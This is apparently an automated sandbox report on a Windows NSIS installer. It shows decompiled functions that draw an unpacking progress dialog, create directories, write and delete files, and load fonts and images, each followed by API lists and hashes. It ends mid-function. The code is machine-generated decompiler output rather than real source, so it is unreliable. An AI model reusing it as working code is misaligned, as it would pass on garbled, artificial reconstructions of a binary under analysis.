                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DAB
                                                                                                                                    • wsprintfA.USER32 ref: 00402DD9
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                      • Part of subcall function 0040528D: lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                      • Part of subcall function 0040528D: SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DFD
                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E0B
                                                                                                                                      • Part of subcall function 00402D59: MulDiv.KERNEL32(0000E4ED,00000064,0000F65D), ref: 00402D6E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                    • String ID: ... %d%%
                                                                                                                                    • API String ID: 722711167-2449383134
                                                                                                                                    • Opcode ID: c853fd1e265afa3cc866d2ebb2e3d0702b28e63c8abd4db680c476409109ce13
                                                                                                                                    • Instruction ID: 26687e7c086addb943d178e474bac2d1c2e6eff041c2855ba1e9bf604ef82ccd
                                                                                                                                    • Opcode Fuzzy Hash: c853fd1e265afa3cc866d2ebb2e3d0702b28e63c8abd4db680c476409109ce13
                                                                                                                                    • Instruction Fuzzy Hash: E201A530501624EBCB217B61EF0CA9F7768AB00B09B94013BF905B11E0C7F849568BEE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404B47, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00404B47(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                    0x00404b55
                                                                                                                                    0x00404b62
                                                                                                                                    0x00404b68
                                                                                                                                    0x00404ba6
                                                                                                                                    0x00404ba6
                                                                                                                                    0x00404bb5
                                                                                                                                    0x00404bbc
                                                                                                                                    0x00000000
                                                                                                                                    0x00404bbe
                                                                                                                                    0x00404b6a
                                                                                                                                    0x00404b79
                                                                                                                                    0x00404b81
                                                                                                                                    0x00404b84
                                                                                                                                    0x00404b96
                                                                                                                                    0x00404b9c
                                                                                                                                    0x00404ba3
                                                                                                                                    0x00000000
                                                                                                                                    0x00404ba3
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404B62
                                                                                                                                    • GetMessagePos.USER32 ref: 00404B6A
                                                                                                                                    • ScreenToClient.USER32 ref: 00404B84
                                                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B96
                                                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404BBC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                                                                                    • Instruction ID: 2835013faa4ef8fe64ab50239a9af457afe7ab7af58273a41a41911e8f87aaae
                                                                                                                                    • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                                                                                    • Instruction Fuzzy Hash: 32015E71900218BAEB01DB94DD85FFEBBFCAF55711F10412BBA50B61D0C7B8A9458BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405753, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405753(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40837c;
				_v36.Group = 0x40837c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40836c;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                                                                                                                                    0x0040575e
                                                                                                                                    0x00405762
                                                                                                                                    0x00405765
                                                                                                                                    0x0040576b
                                                                                                                                    0x0040576f
                                                                                                                                    0x00405773
                                                                                                                                    0x0040577b
                                                                                                                                    0x00405782
                                                                                                                                    0x00405788
                                                                                                                                    0x0040578f
                                                                                                                                    0x0040579e
                                                                                                                                    0x004057a0
                                                                                                                                    0x00000000
                                                                                                                                    0x004057a0
                                                                                                                                    0x004057aa
                                                                                                                                    0x004057b1
                                                                                                                                    0x004057c7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004057c9
                                                                                                                                    0x004057cd

                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405796
                                                                                                                                    • GetLastError.KERNEL32 ref: 004057AA
                                                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004057BF
                                                                                                                                    • GetLastError.KERNEL32 ref: 004057C9
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00405753
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405779
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                    • API String ID: 3449924974-2028306314
                                                                                                                                    • Opcode ID: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
                                                                                                                                    • Instruction ID: acb850f4e5650c60b34604d855087d035bcc6337fc3cb461114b9449d62d825b
                                                                                                                                    • Opcode Fuzzy Hash: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
                                                                                                                                    • Instruction Fuzzy Hash: D0010871D10619EADF109FA4C944BEFBFB8EF14315F00403AE545B6280E7799608CFA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402CDD, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00402CDD(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402D59();
					_t19 = "unpacking data: %d%%";
					if( *0x42f434 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                                    0x00402cea
                                                                                                                                    0x00402cf8
                                                                                                                                    0x00402cfe
                                                                                                                                    0x00402cfe
                                                                                                                                    0x00402d0c
                                                                                                                                    0x00402d0e
                                                                                                                                    0x00402d1a
                                                                                                                                    0x00402d1f
                                                                                                                                    0x00402d21
                                                                                                                                    0x00402d21
                                                                                                                                    0x00402d2c
                                                                                                                                    0x00402d3c
                                                                                                                                    0x00402d4e
                                                                                                                                    0x00402d4e
                                                                                                                                    0x00402d56

                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                                                                                                                    • wsprintfA.USER32 ref: 00402D2C
                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402D3C
                                                                                                                                    • SetDlgItemTextA.USER32 ref: 00402D4E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                                                    • Opcode ID: 36270f0bc33b1e087ec4713eac3c5c9b1e2a439cf011b77b38a90963d77698e8
                                                                                                                                    • Instruction ID: 33366aa7ac8bbaa6b0b87f425f220f6bc3ecfc2d6601bcd49114c331fc5b4eb1
                                                                                                                                    • Opcode Fuzzy Hash: 36270f0bc33b1e087ec4713eac3c5c9b1e2a439cf011b77b38a90963d77698e8
                                                                                                                                    • Instruction Fuzzy Hash: D3F0127150020DEBEF206F51DE1ABEE3769EB14345F40803AFA05B51D0DBF89D568B99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004027A3, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E004027A3(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402B2C(0xfffffff0);
				 *(_t56 - 0x4c) = _t23;
				if(E00405B6B(_t50) == 0) {
					E00402B2C(0xffffffed);
				}
				E00405CDA(_t50);
				_t26 = E00405CFF(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x1c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403361(_t45);
						E0040334B(_t49,  *(_t56 - 0x1c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x2c));
						 *(_t56 - 0x10) = _t54;
						if(_t54 != _t45) {
							E004030DA(_t47,  *((intOrPtr*)(_t56 - 0x30)), _t45, _t54,  *(_t56 - 0x2c));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x48) =  *_t54;
								E00405CBA( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x48);
							}
							GlobalFree( *(_t56 - 0x10));
						}
						E00405DA6( *(_t56 + 8), _t49,  *(_t56 - 0x1c));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030DA(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x4c));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                                                                                    0x004027a3
                                                                                                                                    0x004027a5
                                                                                                                                    0x004027b1
                                                                                                                                    0x004027b4
                                                                                                                                    0x004027be
                                                                                                                                    0x004027c2
                                                                                                                                    0x004027c2
                                                                                                                                    0x004027c8
                                                                                                                                    0x004027d5
                                                                                                                                    0x004027dd
                                                                                                                                    0x004027e0
                                                                                                                                    0x004027e6
                                                                                                                                    0x004027f4
                                                                                                                                    0x004027f9
                                                                                                                                    0x004027fd
                                                                                                                                    0x00402800
                                                                                                                                    0x00402809
                                                                                                                                    0x00402815
                                                                                                                                    0x00402819
                                                                                                                                    0x0040281c
                                                                                                                                    0x00402826
                                                                                                                                    0x00402845
                                                                                                                                    0x0040282d
                                                                                                                                    0x00402832
                                                                                                                                    0x0040283a
                                                                                                                                    0x0040283d
                                                                                                                                    0x00402842
                                                                                                                                    0x00402842
                                                                                                                                    0x0040284c
                                                                                                                                    0x0040284c
                                                                                                                                    0x00402859
                                                                                                                                    0x0040285f
                                                                                                                                    0x00402871
                                                                                                                                    0x00402871
                                                                                                                                    0x00402877
                                                                                                                                    0x00402877
                                                                                                                                    0x00402882
                                                                                                                                    0x00402883
                                                                                                                                    0x00402887
                                                                                                                                    0x0040288b
                                                                                                                                    0x00402891
                                                                                                                                    0x00402891
                                                                                                                                    0x00402898
                                                                                                                                    0x004022a4
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7

                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                                                                                    • GlobalFree.KERNEL32 ref: 0040284C
                                                                                                                                    • GlobalFree.KERNEL32 ref: 0040285F
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 26b0f60b404b7dd9810cf7406648eafe2108f7e7ac5a0eaa5579457d1e27eb68
                                                                                                                                    • Instruction ID: e4f74d6934390f2d90666ea578519db9a9ad75454a4f622c4e36c44a49969c70
                                                                                                                                    • Opcode Fuzzy Hash: 26b0f60b404b7dd9810cf7406648eafe2108f7e7ac5a0eaa5579457d1e27eb68
                                                                                                                                    • Instruction Fuzzy Hash: 8B217C72C00224ABDF217FA58D49DAE7E79EF05324B10823AF520762E0CB7959428F98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401D41, Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E00401D41(int __edx) {
				struct HWND__* _t24;
				CHAR* _t30;
				void* _t40;
				void* _t44;
				signed int _t46;
				int _t50;
				signed int _t53;
				void* _t57;

				_t48 = __edx;
				if(( *(_t57 - 0x2b) & 0x00000001) == 0) {
					_t24 = GetDlgItem( *(_t57 - 8), __edx);
				} else {
					_t24 = E00402B0A(1);
					 *(_t57 - 0x10) = _t48;
				}
				_t46 =  *(_t57 - 0x2c);
				 *(_t57 + 8) = _t24;
				 *(_t57 - 8) = _t46 >> 0x1f;
				_t50 = _t46 & 0x00000003;
				_t53 = _t46 & 0x00000004;
				 *(_t57 - 0x1c) = _t46 >> 0x0000001e & 0x00000001;
				if((_t46 & 0x00010000) == 0) {
					_t30 =  *(_t57 - 0x34) & 0x0000ffff;
				} else {
					_t30 = E00402B2C(_t44);
				}
				 *(_t57 - 0xc) = _t30;
				GetClientRect( *(_t57 + 8), _t57 - 0x58);
				asm("sbb esi, esi");
				_t40 = SendMessageA( *(_t57 + 8), 0x172, _t50, LoadImageA( ~_t53 &  *0x42f420,  *(_t57 - 0xc), _t50,  *(_t57 - 0x50) *  *(_t57 - 8),  *(_t57 - 0x4c) *  *(_t57 - 0x1c),  *(_t57 - 0x2c) & 0x0000fef0));
				if(_t40 != _t44 && _t50 == _t44) {
					DeleteObject(_t40);
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t57 - 4));
				return 0;
			}











                                                                                                                                    0x00401d41
                                                                                                                                    0x00401d45
                                                                                                                                    0x00401d58
                                                                                                                                    0x00401d47
                                                                                                                                    0x00401d49
                                                                                                                                    0x00401d4f
                                                                                                                                    0x00401d4f
                                                                                                                                    0x00401d5e
                                                                                                                                    0x00401d61
                                                                                                                                    0x00401d6b
                                                                                                                                    0x00401d72
                                                                                                                                    0x00401d78
                                                                                                                                    0x00401d84
                                                                                                                                    0x00401d87
                                                                                                                                    0x00401d91
                                                                                                                                    0x00401d89
                                                                                                                                    0x00401d8a
                                                                                                                                    0x00401d8a
                                                                                                                                    0x00401d95
                                                                                                                                    0x00401d9f
                                                                                                                                    0x00401dc4
                                                                                                                                    0x00401ddd
                                                                                                                                    0x00401de5
                                                                                                                                    0x00401df4
                                                                                                                                    0x00401df4
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: eadf5632f44844a23afe189e73ff426df31960e566c07d83677b8a65b624f51f
                                                                                                                                    • Instruction ID: 2c1095f692292a2db486c6c4b01e7c740380de91ab04b39c5b6a94773590f7c7
                                                                                                                                    • Opcode Fuzzy Hash: eadf5632f44844a23afe189e73ff426df31960e566c07d83677b8a65b624f51f
                                                                                                                                    • Instruction Fuzzy Hash: CF215172E00109AFDB05DF98DE44AEEBBB9FB58300F10413AF945F62A1DB789941CB58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401DFF, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E00401DFF(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402B0A(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40b830->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b840 = E00402B0A(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x24));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40b847 = 1;
				 *0x40b844 = _t15 & 0x00000001;
				 *0x40b845 = _t15 & 0x00000002;
				 *0x40b846 = _t15 & 0x00000004;
				E00406188(_t9, _t31, _t33, 0x40b84c,  *((intOrPtr*)(_t35 - 0x30)));
				_t18 = CreateFontIndirectA(0x40b830);
				_push(_t18);
				_push(_t33);
				E004060C4();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                                    0x00401dff
                                                                                                                                    0x00401e0a
                                                                                                                                    0x00401e0c
                                                                                                                                    0x00401e19
                                                                                                                                    0x00401e30
                                                                                                                                    0x00401e35
                                                                                                                                    0x00401e42
                                                                                                                                    0x00401e47
                                                                                                                                    0x00401e4b
                                                                                                                                    0x00401e56
                                                                                                                                    0x00401e5d
                                                                                                                                    0x00401e6f
                                                                                                                                    0x00401e75
                                                                                                                                    0x00401e7a
                                                                                                                                    0x00401e84
                                                                                                                                    0x004025e4
                                                                                                                                    0x00401569
                                                                                                                                    0x00402960
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7

                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401E02
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                                                                                    • ReleaseDC.USER32 ref: 00401E35
                                                                                                                                    • CreateFontIndirectA.GDI32(0040B830), ref: 00401E84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                    • Opcode ID: 1d9a8a3ae7d0f4c08c4cc2f1ea7589ff60d4b02c6505e580feff443ba7e622f9
                                                                                                                                    • Instruction ID: a64a8fd5c7967ad14cb58d656b7ea6f3e4e73d527becce3b4172ef5f4eebc884
                                                                                                                                    • Opcode Fuzzy Hash: 1d9a8a3ae7d0f4c08c4cc2f1ea7589ff60d4b02c6505e580feff443ba7e622f9
                                                                                                                                    • Instruction Fuzzy Hash: 7B015272904344AFE7016B70AE49B9A3FF8EB15705F108539F245BA1F3CBB804059B6C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401C0A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E00401C0A(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402B0A(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402B0A(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x20) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402B2C(0x33);
				}
				__eflags =  *(_t64 - 0x20) & 0x00000002;
				if(( *(_t64 - 0x20) & 0x00000002) != 0) {
